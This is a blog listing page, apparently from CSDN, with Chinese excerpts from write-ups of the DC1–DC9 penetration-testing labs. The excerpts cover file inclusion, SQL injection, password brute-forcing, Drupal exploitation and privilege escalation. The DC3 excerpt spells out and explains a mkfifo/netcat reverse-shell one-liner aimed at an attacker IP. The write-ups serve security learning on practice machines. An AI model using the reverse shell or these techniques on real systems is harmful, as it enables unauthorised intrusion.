靶场
文章平均质量分 72
靶场练习
一条贤鱼的学习站
这个作者很懒,什么都没留下…
展开
-
DC5靶场
由上可以知道web服务器是nginx1.6.2,客户端向nginx服务器发送的每一条请求都会记录在访问日志上(客户端IP,浏览器信息,referer,请求处理时间,请求URL等都可以在访问日志中得到)。GNU Screen是一款由GNU计划开发的用于命令行终端切换的自由软件。它提供了统一的管理多个会话的界面和相应的功能。由以上可知道thankkyou.php调用footer.php,可能存在文件包含漏洞。正确的是:file=原创 2022-09-19 15:57:02 · 1073 阅读 · 0 评论 -
DC4靶场练习
思路:在www-data用户上,我先是查看了SUID提权,发现了/home/jim/test.sh这个文件具有SUID权限,试着用这个文件提权,但是www-data用户并没有/bin/sh 和/bin/bash。后来在参考了别人的笔记,在ssh登录jim成功时,有一封邮件我并没有注意到,查看了该邮件里面有charles用户的密码,切换到charles用户,使用sudo -l命令查询,发现/usr/bin/teehee文件具有sudo权限,可以进行提权。1,登录成功以后,页面是3个命令显示。原创 2023-06-24 22:34:29 · 60 阅读 · 0 评论 -
DC9靶场练习
登录三个用户,最终在janitor的家目录下找到了隐藏文件.secrets-for-putin,在该目录下有个密码文本。上面sqlmap爆破数据库的时候,有一个数据库是users,试试从这个库里寻找线索。3,接下里是参考别人的文章进行下去的,需要利用knockd服务。1,思路:search页面有个搜索框,有可能存在POST注入。获取到账号:admin 密码:transorbital1。将用户名和密码都保存到文件中,用hydra进行破解。将该密码本保存下来,再次进行爆破。得到了新用户fredf的密码。原创 2023-06-30 03:19:50 · 142 阅读 · 0 评论 -
DC8靶场练习
在contact us>webform>form settings中发现可以上传PHP代码,上传一个反弹shell的代码。思路:当点击该页面的“welcome to DC8”字样时,发现上面的url变化为“原因:这个报错是由于windows系统下编辑然后上传到Linux系统执行导致的。开启监听之后,在contact us中提交一个留言来反弹shell。解决方案:本地编辑查看文件类型:set ff=unix。”,该页面有可能存在SQL注入漏洞。接着运行该文件,发现还是没法运行。查询该数据库下的表名。原创 2023-06-29 05:29:32 · 129 阅读 · 0 评论 -
DC7靶场练习
这个靶场大部分都是参考别人的,后期再重新过一遍吧。原创 2023-06-27 21:35:26 · 132 阅读 · 0 评论 -
DC6靶场练习
有2点需要注意:一,需要编辑hosts文件才能访问网站;二,给了一条线索,是一个密码文件。原创 2023-06-27 17:15:32 · 106 阅读 · 0 评论 -
DC3靶场练习
bin/bash -i 2>&1 | nc IP 端口 >/tmp/f: 先将上一步获取到的命令在bash终端中执行,并将结果通过nc输出到目标,并且将目标的命令重新写入临时文件f.mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 攻击者ip 端口 > /tmp/f。1,rm /tmp/f: 首先删除l临时文件f,以免造成冲突,(后面的分号;3, cat /tmp/f | /bin/bash -i 2>&1 | nc IP 端口 >/tmp/f。原创 2023-04-11 22:09:29 · 283 阅读 · 0 评论 -
DC2靶场练习
通过以上扫描报告可以看出,虽然没有扫描出漏洞,但是却意外获得了三个用户名:admin,tom,jerry.和flag1的提示相呼应,所以现在需要做的就是使用cewl工具进行密码收集原创 2023-04-09 15:26:36 · 182 阅读 · 0 评论 -
DC1靶场练习
大概意思就是查找passwd文件来找寻flag4文件,但是前面我们已经提权成功利用find命令找到了flag4文件,所以现在直接查看就行。思路:现在我们可以登录进来数据库,可以采用替换的方式,找到靶机的加密算法,将我们设定的密码转换成哈希密码,替换users表中的密码。已经查找到了用户名和密码,但是密码已经被加密了,采用的是哈希密码,破解难度比较大。搜索到drupal7的配置文件是settings.php ,查找该文件。开放端口:22,80,111,36890.三,漏洞利用(获取webshell)原创 2023-04-08 14:30:02 · 228 阅读 · 0 评论